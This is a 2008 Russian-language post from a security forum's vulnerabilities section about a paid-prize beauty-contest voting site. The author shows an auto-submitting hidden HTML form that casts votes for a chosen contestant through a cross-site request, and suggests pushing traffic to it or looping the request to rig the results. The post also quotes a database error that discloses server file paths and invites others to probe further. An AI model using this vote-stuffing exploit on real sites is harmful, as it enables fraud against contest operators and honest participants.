HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Мисс Вконтакте 2008 xD
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Мисс Вконтакте 2008 xD
  #1  
Старый 16.08.2008, 06:44
T-Rey
Постоянный
Регистрация: 04.07.2007
Сообщений: 375
Провел на форуме:
2670099

Репутация: 730
Отправить сообщение для T-Rey с помощью ICQ
По умолчанию Мисс Вконтакте 2008 xD
Ходя по интернету наткнулся на сайт http://missvkontakte.com/

Цель его такова:
Девушки регистрируются
За них голосуют
И сами призы
Цитата:
1-место Приз: 300 000 рублей.
2-место Приз: 100 000 рублей.
3-место Приз: 50 000 рублей.
Голоса можно было отправить несколькими способами:
1 голос бесплатно (по ip каждые пол часа)
10 голосов СМС
100 голосов СМС

Ну покопавшись в сорцах сайта обнорушил, что +1 добавляется обычным post запросом (хоть бы капчу прикрутили )

И был написан iframe
PHP код:
<html>
<body>
<form name=MyForm action="http://missvkontakte.com/simplevoice.php" method=POST>
<input type=hidden name="id_miss" value="Номер учасницы">
</form>
<script>
document.MyForm.submit();
</script>
</body>
</html
Следовательно сливаем на него трафф и голоса летят) или крути пост через ТОПген

Так же заметил ошибку мускула где раскрытие путей:
PHP код:
Warningmysql_fetch_array(): supplied argument is
 not a valid MySQL result resource in /www/missvkon/www/htdocs/index.php on line 261 

Есть идеи? Что ещё можно найти тут?



P.S. Сайт ну никак не соответствует призовой сумме



Благодарю комрада mr.The за помощь оказанную мне в поиске уязвимостей сайта.
Последний раз редактировалось T-Rey; 17.08.2008 в 19:20..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Приму в дар Don Anton Болталка 9 02.08.2008 18:02
ВКонтакте, Одноклассники и Top4Top, или улов социальных сетей baltazar SЕО - тонкости, методы раскрутки 11 07.06.2008 14:53
Microsoft представила Windows Server 2008 Vanterlog Мировые новости. Обсуждения. 0 28.02.2008 14:20
Windows 2008 procedure Windows 3 05.02.2008 09:49



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ